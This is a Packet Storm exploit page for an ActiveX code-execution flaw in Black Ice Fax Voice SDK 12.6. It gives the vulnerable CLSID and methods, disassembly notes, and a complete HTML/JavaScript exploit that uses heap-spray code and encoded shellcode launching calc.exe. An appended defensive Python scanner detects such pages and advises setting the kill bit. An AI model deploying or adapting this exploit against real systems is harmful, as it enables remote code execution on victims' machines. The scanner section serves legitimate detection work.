
Black Ice Fax Voice SDK 12.6 Code Execution

Date: 20 Jun 2011 | Reported by: mr_me | Type: packetstorm | Source: packetstormsecurity.com

Exploit for an integer dereference vulnerability discovered in the Fax OCX file of Black Ice Fax Voice SDK v12.6, which allows remote code execution.

Code
`<html>  
<!--  
Black Ice Fax Voice SDK v12.6 - integer dereference code execution exploit  
Date: Jun 20, 2011  
Link: http://www.blackice.com/Fax%20C++%20ActiveX.htm  
Version: 12.6  
Tested on: WinXP - IE 6 & 7  
  
Class FAX  
GUID: {2E980303-C865-11CF-BA24-444553540000}  
Number of Interfaces: 1  
Default Interface: _DFAX  
RegKey Safe for Script: False  
RegkeySafe for Init: False  
KillBitSet: False  
  
Meh, despite the above, I found this bug slightly amusing >:)  
  
There's an integer overflow in this section of fax.ocx, which is how I found the dereference vulnerability.  
  
1000CFA3 MOV ECX,[EBP+8] < --- get our variable  
1000CFA6 MOV EDX,[ECX] < --- dereference  
1000CFA8 MOV ECX,[EBP+8] < --- get our next variable (meh)  
1000CFAB CALL [EDX+14] < --- !!!!  
  
and...  
  
EIP 1000CFA6 -> 51EC8B55  
EAX 1000CF82 -> 51EC8B55  
EBX 0013EC68 -> 01D29E90  
ECX FFFFFFFF  
EDX 73F360D3 -> EB0C4589  
EDI 0013EB98 -> 73F4D682  
ESI 00000000  
EBP 0013EB94 -> 0013EC10  
ESP 0013EB90 -> 0003A1A0  
  
methods vulnerable:  
GetFirstItem()  
GetItemQueue()  
  
prob more.  
-->  
  
<object classid='clsid:2E980303-C865-11CF-BA24-444553540000' id='target'/></object>  
<script language='javascript'>  
// Calc.exe  
var shellcode = unescape(  
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+  
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+  
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+  
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+  
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+  
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+  
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+  
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'  
);  
  
var nops = unescape('%u0a0a%u0a0a');  
var headersize = 20;  
var slackspace = headersize + shellcode.length;  
while(nops.length < slackspace) {  
nops += nops;  
}  
var fillblock = nops.substring(0, slackspace);  
var block = nops.substring(0, nops.length - slackspace);  
while((block.length + slackspace) < 0x50000) {  
block = block + block + fillblock;  
}  
memory=new Array();  
for(counter=0; counter<200; counter++){  
memory[counter] = block + shellcode;  
}  
var boom = 168430090; // 0x0a0a0a0a  
target.GetItemQueue(boom);  
</script>  
</html>  
  
`
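
A defender-side check built from the identifiers in the advisory above (an added example, not part of the original post): a static scanner that flags HTML which instantiates the FAX control's CLSID and scripts the two methods listed as vulnerable. The name `scan_html`, the severity labels, the `%u` heuristic and both sample documents are constructed for illustration.

```python
import re

# CLSID and method names are taken from the advisory text above.
FAX_CLSID = "clsid:2e980303-c865-11cf-ba24-444553540000"
RISKY_METHODS = ("GetFirstItem", "GetItemQueue")

OBJECT_RE = re.compile(r"<object\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""\b(classid|id)\s*=\s*["']?([^"'\s>]+)""", re.I)
# Assumption: a run of %uXXXX escapes passed to unescape() is treated as suspicious.
ESCAPED_RE = re.compile(r"unescape\s*\(\s*['\"](?:%u[0-9a-f]{4}){2,}", re.I)


def scan_html(html):
    """Return (severity, message) findings for one HTML document."""
    findings, ids = [], []
    for tag in OBJECT_RE.findall(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        if attrs.get("classid", "").lower() == FAX_CLSID:
            ids.append(attrs.get("id"))
            findings.append(("medium", "FAX control instantiated, id=%s" % attrs.get("id")))
    for obj_id in filter(None, ids):
        call_re = re.compile(r"\b%s\s*\.\s*(%s)\s*\(([^)]*)\)"
                             % (re.escape(obj_id), "|".join(RISKY_METHODS)), re.I)
        for method, arg in call_re.findall(html):
            findings.append(("high", "%s.%s(%s) scripted" % (obj_id, method, arg.strip())))
    if ids and ESCAPED_RE.search(html):
        findings.append(("high", "%u-escaped unescape() data on a page loading the control"))
    return findings


# Constructed sample: loads the control and scripts a listed method (no payload).
SAMPLE_SUSPICIOUS = """<html>
<object classid='clsid:2E980303-C865-11CF-BA24-444553540000' id='target'></object>
<script>
var pad = unescape('%u4141%u4141');
target.GetItemQueue(168430090);
</script></html>"""

# Constructed sample: unrelated control with a placeholder CLSID.
SAMPLE_BENIGN = """<html>
<object classid='clsid:00000000-0000-0000-0000-000000000000' id='player'></object>
<script>player.Play();</script></html>"""

if __name__ == "__main__":
    for name, doc in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, scan_html(doc))
```

Static matching misses pages that build the tag or the call at run time, so a clean result is inconclusive. Since the advisory lists `KillBitSet: False`, setting the kill bit for this CLSID is the more reliable control.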
